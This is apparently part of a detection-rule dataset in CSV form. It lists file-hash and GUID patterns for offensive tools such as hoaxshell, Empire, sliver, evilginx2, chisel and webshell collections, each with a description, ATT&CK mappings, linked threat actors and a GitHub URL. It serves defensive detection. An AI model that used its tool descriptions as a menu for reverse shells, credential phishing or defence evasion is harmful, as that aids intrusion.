"*5721ff8bccba2fec3918c3464b519d9b02b69f0cc69639eaa8964174d4cc6e36*",".{0,1000}5721ff8bccba2fec3918c3464b519d9b02b69f0cc69639eaa8964174d4cc6e36.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#filehash","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","27017"
"*572542904260191ebdf338ac8d2f3dc38057236e8373e35f08f6297850c62f8d*",".{0,1000}572542904260191ebdf338ac8d2f3dc38057236e8373e35f08f6297850c62f8d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27018"
"*57269059f0f5e8e510d304e8368975291e4b583c4d5388375ea122e46b8ff357*",".{0,1000}57269059f0f5e8e510d304e8368975291e4b583c4d5388375ea122e46b8ff357.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","27019"
"*5738fd3f47fb386d8cf45ff598545140f51b3b6507fa549dafc43c51dd27488f*",".{0,1000}5738fd3f47fb386d8cf45ff598545140f51b3b6507fa549dafc43c51dd27488f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27023"
"*573b83b3dc86832085eca5958fa11c0b5874edb3fdf84a016a21a8cc40454ea2*",".{0,1000}573b83b3dc86832085eca5958fa11c0b5874edb3fdf84a016a21a8cc40454ea2.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","27025"
"*573ea06d067eeed688c7bc60b367e0b47059a6af03ad5b4d53bb90549894a0bd*",".{0,1000}573ea06d067eeed688c7bc60b367e0b47059a6af03ad5b4d53bb90549894a0bd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27026"
"*5740d6067561fcd27239374abbfd7076d3df5909b107a32bbb2e9eec0e9f4d61*",".{0,1000}5740d6067561fcd27239374abbfd7076d3df5909b107a32bbb2e9eec0e9f4d61.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27027"
"*574584f229e8812dd5a924880611e84120da7589b86a3417fecce77687720ebb*",".{0,1000}574584f229e8812dd5a924880611e84120da7589b86a3417fecce77687720ebb.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","27029"
"*5745976E-48A7-4F79-9BAA-82D1F43D1261*",".{0,1000}5745976E\-48A7\-4F79\-9BAA\-82D1F43D1261.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","27030"
"*5751db8dd5b4407b720b3bea4b8e33b560a8f0879318bb3327bd7e4f102af12a*",".{0,1000}5751db8dd5b4407b720b3bea4b8e33b560a8f0879318bb3327bd7e4f102af12a.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","27032"
"*575b267a045e31d3616cfdcc275c8bb6617136b1446253ee2954104b199276ff*",".{0,1000}575b267a045e31d3616cfdcc275c8bb6617136b1446253ee2954104b199276ff.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27036"
"*57630a0b38ad185ff8a8d0706ff9cebfd12f47526ceeeb90cc3a17e124316fe2*",".{0,1000}57630a0b38ad185ff8a8d0706ff9cebfd12f47526ceeeb90cc3a17e124316fe2.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27040"
"*5767888351c96bd64880150630f6271d79c3a88053967a7b01da85b74b1ed7fe*",".{0,1000}5767888351c96bd64880150630f6271d79c3a88053967a7b01da85b74b1ed7fe.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27042"
"*5767c1bb1b6d4391d8536b2c0736820fee8f7f1b0017c754a6ee7deccbc693b4*",".{0,1000}5767c1bb1b6d4391d8536b2c0736820fee8f7f1b0017c754a6ee7deccbc693b4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27043"
"*57681a07f437b52ecf05f2b1a6f268c5d3596c9627280d3ddc2750a20b7d5dcf*",".{0,1000}57681a07f437b52ecf05f2b1a6f268c5d3596c9627280d3ddc2750a20b7d5dcf.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","27044"
"*576908f3dccaced486894a56a256a88dea369d97302e1793f17660f7062d0c22*",".{0,1000}576908f3dccaced486894a56a256a88dea369d97302e1793f17660f7062d0c22.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27046"
"*5776b8a6c27e3375134e81fe72a0eebf781029ff5e05683fdc58459741a7c437*",".{0,1000}5776b8a6c27e3375134e81fe72a0eebf781029ff5e05683fdc58459741a7c437.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27050"
"*577b289bf6f2a7353f4fb0f6a8a84103f6583710a08d8ff1e1fb817b45cccaa4*",".{0,1000}577b289bf6f2a7353f4fb0f6a8a84103f6583710a08d8ff1e1fb817b45cccaa4.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","#filehash","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","27051"
"*577b85630ecfd64d6817de11c4abf256512d299f70998c8c531202272123b202*",".{0,1000}577b85630ecfd64d6817de11c4abf256512d299f70998c8c531202272123b202.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27052"
"*57808871665b988de85ec19ab01960cb6c88aea9c996d5b9f6115ec60070a949*",".{0,1000}57808871665b988de85ec19ab01960cb6c88aea9c996d5b9f6115ec60070a949.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","27053"
"*5782C660-DD26-40DC-B06C-B9275371EC55*",".{0,1000}5782C660\-DD26\-40DC\-B06C\-B9275371EC55.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","Collection of self-made Red Team tools","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","0","#GUIDproject","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","27054"
"*578a42cf90cf1bcc569f925d7909bbedd2756367906d2875a23cbc8bb1628577*",".{0,1000}578a42cf90cf1bcc569f925d7909bbedd2756367906d2875a23cbc8bb1628577.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","#filehash","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","27056"
"*578b34b94963895dd57cb223ad0a79b17dc8d2c71bfdf8f977a5903e326ba7eb*",".{0,1000}578b34b94963895dd57cb223ad0a79b17dc8d2c71bfdf8f977a5903e326ba7eb.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27057"
"*578bd74856cec7caa02f5f6c53d9412e06bc7eefd6c5213ee8f767a91d88c4c9*",".{0,1000}578bd74856cec7caa02f5f6c53d9412e06bc7eefd6c5213ee8f767a91d88c4c9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27058"
"*5791ebb3782d4210dcd5e16ca5f8e16d30582b73f87fc848735a09374190d010*",".{0,1000}5791ebb3782d4210dcd5e16ca5f8e16d30582b73f87fc848735a09374190d010.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","27059"
"*579a0817c99aa25f8bce0b453da2bb65c622a51c2d702512899a244d675f3305*",".{0,1000}579a0817c99aa25f8bce0b453da2bb65c622a51c2d702512899a244d675f3305.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","27061"
"*579ba94b0bffde7e8308bae8f7ba129e47f7e36a3ed7e57ce0454d01629c2baa*",".{0,1000}579ba94b0bffde7e8308bae8f7ba129e47f7e36a3ed7e57ce0454d01629c2baa.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","27062"
"*579e0f946f0d165567b7a8e933b6000368480ce09d51042e8753e4b389318dbc*",".{0,1000}579e0f946f0d165567b7a8e933b6000368480ce09d51042e8753e4b389318dbc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27063"
"*57a0a978ab19598abf7185762834fef1b4dbd4db30d2fb85d411a0e22821df25*",".{0,1000}57a0a978ab19598abf7185762834fef1b4dbd4db30d2fb85d411a0e22821df25.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","#filehash","N/A","10","5","487","51","2024-11-21T17:36:55Z","2023-08-02T14:30:41Z","27064"
"*57a36d59b199ee6176b1bdf951cac5e4dcd3895a0e5307706b12b527c0cce9b3*",".{0,1000}57a36d59b199ee6176b1bdf951cac5e4dcd3895a0e5307706b12b527c0cce9b3.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27065"
"*57A893C7-7527-4B55-B4E9-D644BBDA89D1*",".{0,1000}57A893C7\-7527\-4B55\-B4E9\-D644BBDA89D1.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","#GUIDproject","N/A","9","3","240","26","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z","27066"
"*57bdf28c39480b3e91fd8e433dce4c9f032447f9bf1947a7b8362645ad213732*",".{0,1000}57bdf28c39480b3e91fd8e433dce4c9f032447f9bf1947a7b8362645ad213732.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27068"
"*57c1670e15a47e02637545cc4a3ad421000a98279df961fc6d454a5c0271421e*",".{0,1000}57c1670e15a47e02637545cc4a3ad421000a98279df961fc6d454a5c0271421e.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/securycore/Ikeext-Privesc","1","0","#filehash","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","27069"
"*57c646df3c07792d9c6e479b7faa5ccd7802dc03dc49e477534e2322cb753bf9*",".{0,1000}57c646df3c07792d9c6e479b7faa5ccd7802dc03dc49e477534e2322cb753bf9.{0,1000}","offensive_tool_keyword","portscan","A simple TCP and UDP portscanner written in Go","T1595 - T1596 - T1594","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/zs5460/portscan","1","0","#filehash","N/A","N/A","1","14","4","2022-11-11T09:26:47Z","2019-06-04T09:00:00Z","27070"
"*57c7c32de040ad8525da2c58585fe1c0e7bfd848b81308015a055e81d8cb5492*",".{0,1000}57c7c32de040ad8525da2c58585fe1c0e7bfd848b81308015a055e81d8cb5492.{0,1000}","offensive_tool_keyword","AppProxyC2","simple POC to show how to tunnel traffic through Azure Application Proxy","T1090 - T1572 - T1071","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/xpn/AppProxyC2","1","0","#filehash","N/A","9","10","69","18","2021-04-21T13:02:15Z","2021-04-21T10:46:16Z","27071"
"*57cc2a0322016a734d1ff1718bca7f1deb0df3309eeac2222d663b48da7dfc65*",".{0,1000}57cc2a0322016a734d1ff1718bca7f1deb0df3309eeac2222d663b48da7dfc65.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27072"
"*57d4776f876ce736a4fc01476dfc2bb04672edbd7a5f52886a3b11528cfc23fb*",".{0,1000}57d4776f876ce736a4fc01476dfc2bb04672edbd7a5f52886a3b11528cfc23fb.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","27074"
"*57D4D4F4-F083-47A3-AE33-AE2500ABA3B6*",".{0,1000}57D4D4F4\-F083\-47A3\-AE33\-AE2500ABA3B6.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery","https://github.com/redskal/SharpAzbelt","1","0","#GUIDproject","N/A","8","1","26","7","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z","27075"
"*57d785125cf62ffdb727ac7f56110dc0ab0403f033caf958b717fc93f963f097*",".{0,1000}57d785125cf62ffdb727ac7f56110dc0ab0403f033caf958b717fc93f963f097.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","27076"
"*57dbbf5283ae35badf6a08c683f767a44c9efdde9623c0fa6429d8672c97a18e*",".{0,1000}57dbbf5283ae35badf6a08c683f767a44c9efdde9623c0fa6429d8672c97a18e.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","27077"
"*57ea373248f438fc9138d17c018defcbf8668884f234d451da112fd544667d83*",".{0,1000}57ea373248f438fc9138d17c018defcbf8668884f234d451da112fd544667d83.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27078"
"*57eda2366c187ce90c39a4710ff1fe62a7d667d25bf9ba63dbe34bf44b0ff684*",".{0,1000}57eda2366c187ce90c39a4710ff1fe62a7d667d25bf9ba63dbe34bf44b0ff684.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","27080"
"*57ef38c793bc416b93685ed0d2b44971860a2026a7dd9eff7dd2cd5cc6630120*",".{0,1000}57ef38c793bc416b93685ed0d2b44971860a2026a7dd9eff7dd2cd5cc6630120.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27081"
"*57f5a53203d19daa9bb094b442bc029a374686af5be71741e5536e35590e9f9c*",".{0,1000}57f5a53203d19daa9bb094b442bc029a374686af5be71741e5536e35590e9f9c.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27083"
"*57fc37bfab5489b2ace66257d03b23a098ddc80d25b22540e0e5745becc4dbad*",".{0,1000}57fc37bfab5489b2ace66257d03b23a098ddc80d25b22540e0e5745becc4dbad.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","27084"
"*57FD94EC-4361-43FD-AB9D-CDB254C0DE8F*",".{0,1000}57FD94EC\-4361\-43FD\-AB9D\-CDB254C0DE8F.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","0","#GUIDproject","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","27085"
"*5804dab3b58ddd2e4e2a198083e43b3f1759056d33e03d3a26a5c5fc4ce5a5f9*",".{0,1000}5804dab3b58ddd2e4e2a198083e43b3f1759056d33e03d3a26a5c5fc4ce5a5f9.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","27086"
"*580ba177-cf9a-458c-a692-36dd6f23ea77*",".{0,1000}580ba177\-cf9a\-458c\-a692\-36dd6f23ea77.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","#GUIDproject","N/A","4","2","105","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z","27088"
